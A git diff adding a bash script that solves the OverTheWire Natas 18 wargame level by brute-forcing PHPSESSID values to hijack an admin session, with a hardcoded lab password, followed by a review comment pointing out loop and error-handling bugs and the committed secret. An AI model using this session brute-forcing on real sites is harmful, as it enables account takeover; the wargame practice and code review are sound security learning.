diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh
new file mode 100755
index 0000000..0a6f2aa
--- /dev/null
+++ b/overthewire/natas/scripts/natas18.sh
@@ -0,0 +1,26 @@
+#!/usr/bin/env bash
+
+#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+ local SESSION_ID=$1
+ curl http://natas18.natas.labs.overthewire.org/index.php \
+ -X POST \
+ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
+ -d "username=$USERNAME" \
+ -d "password=$PASSWORD" \
+ --cookie "PHPSESSID=$SESSION_ID" \
+ -sS \
+ | grep "regular user" &>/dev/null
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+ printf "Attempt: %2d" $i
+ req "$i" && echo -en '\r' || $(echo " [admin]"; break)
+
+done
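Review bot: The `|| $(echo " [admin]"; break)` arm on the last loop line cannot work as written: the command substitution runs in a subshell, so `break` never leaves the `for` loop, and the captured text ` [admin]` is then executed as a command instead of being printed. An explicit conditional avoids both problems and the `a && b || c` pitfall: `if req "$i"; then echo -en '\r'; else echo " [admin]"; break; fi`. Because `req` returns only grep's status, a failed or timed-out curl request is indistinguishable from a response that lacks "regular user", so a transport error would be reported as a match; checking curl's exit status separately (e.g. capturing the body first with `body=$(curl ...) || return 2`) would separate the two cases. The basic-auth password is also committed in clear text on the `-u` line and is passed on curl's argv; reading it from the environment, for instance `-u "natas18:${NATAS18_PASS:?}"` (variable name is a constructed example), keeps it out of the repository history.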